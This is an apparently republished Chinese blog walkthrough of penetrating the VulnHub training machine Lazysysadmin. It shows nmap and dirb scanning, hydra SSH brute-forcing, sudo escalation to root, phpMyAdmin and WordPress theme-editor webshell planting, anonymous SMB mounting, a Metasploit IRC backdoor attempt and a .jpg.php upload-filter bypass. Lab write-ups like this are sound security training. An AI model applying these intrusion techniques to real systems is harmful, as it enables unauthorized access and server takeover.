IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> [VulnHub靶机渗透]三:Lazysysadmin -> 正文阅读

[系统运维][VulnHub靶机渗透]三:Lazysysadmin

一、实验环境

kali:192.168.56.104
扫描同一网段,探测主机:

nmap -sP 192.168.56.0/24

在这里插入图片描述
这就好办了,确定靶机ip为192.168.56.103

二、信息收集

扫描端口:
nmap -sS -Pn -T4 -sV -O 192.168.56.103

在这里插入图片描述
所得到的信息:
OS: Linux 3.2 - 4.9(Ubuntu)
22端口: ssh——OpenSSH 6.6.1
80端口: http——Apache httpd 2.4.7
139端口: netbios——Samba smbd 3.x - 4.x
445端口: netbios——Samba smbd 4.3.11
3306端口: mysql——MySQL
6667端口: irc——InspIRCd

扫描目录:
dirb http://192.168.56.103
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
扫描出了很多目录,后面的就不一一截图了,等下进行漏洞探测!

三、渗透测试

1. 22端口(ssh爆破)

尝试ssh爆破:
在这里插入图片描述
很遗憾没能直接爆破出来,但在我们扫描目录的时候不难发现这是一个wordpress博客网站

进到主页里面寻找有用信息:
在这里插入图片描述
满屏的togie,啧啧,指定用户名,继续进行ssh爆破:

hydra -l togie -P password.txt -vV -t4 192.168.56.103 ssh  

在这里插入图片描述

用户名:	togie
 密码:	12345

也可以使用msf的auxiliary/scanner/ssh/ssh_login模块,爆破ssh

ssh连接:
ssh togie@192.168.56.103
在这里插入图片描述

从gid和uid可以看出我们并不是root权限
在这里插入图片描述
尝试提权:
sudo su 切换root身份,发现直接可以获得root权限:
在这里插入图片描述
在网站根目录下写马:
在这里插入图片描述
蚁剑连接失败,enmm22端口就到这儿吧!
在这里插入图片描述

2. 网站主页

主要从两个方面入手:
1、wordpress登陆界面
2、phpmyadmin登陆界面

另外网站存在robots.txt文件:
在这里插入图片描述
前三个都没什么用,第四个的图片名有点像base64:
在这里插入图片描述
解码后:I$8b4f5a97-4757-4157-afe8-9a1a8,还看不出来作用,先放着
在这里插入图片描述

phpmyadmin

默认的phpmyadmin配置文件位于phpmyadmin文件夹下,一般以下两个都是:

  • phpmyadmin/libraries/config.default.php
  • ./config.inc.php
root@LazySysAdmin:/usr/share/phpmyadmin/libraries# cat config.default.php 

查看config.default.php配置文件:只有用户名没有密码。。
在这里插入图片描述

但空密码登陆被禁止:
在这里插入图片描述
/etc/phpmyadmin/config-db.php配置文件中找到了线索

用户名:phpmyadmin
密码:TogieMYSQL12345

在这里插入图片描述
但还是没办法登陆:
在这里插入图片描述
最终用root TogieMYSQL12345成功登录!
在这里插入图片描述

phpmyadmin挂马的两种方式:
1、利用into outfile写文件挂马

show variables like "%secure%";
查看 MySQL 自定义的输出路径
在这里插入图片描述
已经指定了路径,那就先尝试一下向指定路径写马:
select "<?php phpinfo();?>" into outfile "/var/lib/mysql-files/test.php"
在这里插入图片描述

写入成功,浏览器查看并没有被解析

在这里插入图片描述
那就只能修改secure_file_priv的值,然后写入根路径了。
之前已经确定了网站根路径为:/var/www/html
在这里插入图片描述
set global secure_file_priv = ''

在这里插入图片描述
失败。

2、利用日志文件挂马
查看全局日志情况:show variables like "%general%"
不仅关闭,还限制了路径
在这里插入图片描述

开启日志记录:
set global general_log = on

在这里插入图片描述

设置日志路径为网站根目录:
set global general_log_file = "/var/www/html"

在这里插入图片描述
又失败了。

wordpress登陆

查看wordpress数据库,但报错了
在这里插入图片描述
看了看其他大佬的博客,好像是phpmyadmin配置文件本身的问题,去改一下试试。

找到phpmyadmin的配置文件:config.inc.php

将下面这一行:
$cfg['Servers'][$i]['table_uiprefs'] = 'pma_table_uiprefs';

改为:
$cfg['Servers'][$i]['pma__table_uiprefs'] = 'pma__table_uiprefs';
se,x_16)
在这里插入图片描述

使用service apache2 restart重启apache服务就可以了。(需要使用root权限操作)
就可以访问数据库内容了:

Admin 的密码被加密了

不是MD5加密,emm先搁置一下,至少我们知道存在用户Admin可以登录wordpress

$P$B.LCmtO3gkm0PdZNkBwgz2HQweq2Ur0

在这里插入图片描述
换一种方式获取密码:
查看wordpress的配置文件:
/var/www/html/wordpress/wp-config.php
在这里插入图片描述

在这里插入图片描述
密码为:TogieMYSQL12345^^
成功登录:
在这里插入图片描述
上传一句话木马被拦截:
在这里插入图片描述
在主题编辑的地方找到一个php文件:
echo "11111111111";
在这里插入图片描述
网页访问可以正常输入
在这里插入图片描述

直接写入一句话,通过蚁剑连接:

在这里插入图片描述
在这里插入图片描述

3. 139 445端口(SMB)

SMB协议用于实现局域网的文件和打印机共享,Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。

常见的用于实现该共享功能的开放端口是139和445端口,一般连接会要求用户密码,但某些时候也会允许无密码连接。

本次就利用samba配置不当,导致无密码连接时泄漏重要文件,来进行渗透。
在这里插入图片描述

又发现允许无账号密码连接:
在这里插入图片描述
在连接目标主机的SMB文件共享服务时,有两种方式:

1、资源管理器连接
2、命令行连接

1、资源管理器连接:

1、Windows下,打开我的电脑,在地址栏输入 \192.168.56.103,提示输入账号密码,即可。
在这里插入图片描述

2、Linux下,在资源管理器下的网络服务中,输入smb://192.168.56.103 即可。

在这里插入图片描述
2、命令行连接:

1、远程网络挂载:
mount -t cifs //ip地址/path/to/share path/to/mount

mount:挂载命令

-t cifs: 用cifs文件系统挂载samba共享文件,如果提示错误的文件系统的话,可能是没有cifs,需要自己安装。【centos: yum install nfs-utils】

//ip地址/path/to/share:共享目录路径

path/to/mount:要挂载的路径,需要自己创建一个,这里我创建的文件夹是mount

mount -t cifs //192.168.56.103/share$ ./mount/
成功:
在这里插入图片描述
2、smbclient连接在这里插入图片描述
445端口的渗透测试就到此

4、6667端口(irc)

6667端口运行着irc服务软件InspIRCd,InspIRCd是一个可扩展的IRC软件包,可以在Linux、BSD或视窗系统下建立一个运行稳定界面时尚体积小巧的IRC聊天服务器。

搜索模块:

search unreal_ircd_3281_backdoor

利用模块

use exploit/unix/irc/unreal_ircd_3281_backdoor

查看参数,设置目标ip

show options
set rhosts 目标IP地址

执行:

exploit

但并不成功!

四、总结

总结一下渗透该靶机的大致的流程:

1、扫描主机,搜集端口服务及OS信息
2、利用信息泄漏(my name is togie)及弱口令爆出ssh密码
3、连接ssh,利用用户权限配置不当,得到root权限
4、利用root权限查看配置文件,得到phpmyadmin帐号密码
5、利用root权限,得到用户信息,登录Wordpress默认管理后台
6、在Wordpress中利用文件上传及插件进行种马,getshell
7、samba文件共享信息泄露,得到之前爆出的账号密码
知识点:

Wordpress默认后台是 /wp-admin,其中插件功能存在众多漏洞,可以利用插件挂马。

phpmyadmin中挂马的两种方式:

1、into outfile直接写文件;
2、利用日志执行包含木马的sql语句。

做网站渗透时,一定不要忽略robots.txt文件,可能会有意外收获

Apache读文件名是从前到后,因此可以利用name.jpg.php来绕过检测

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-03-10 23:03:01  更:2022-03-10 23:06:43 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 3:17:29-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码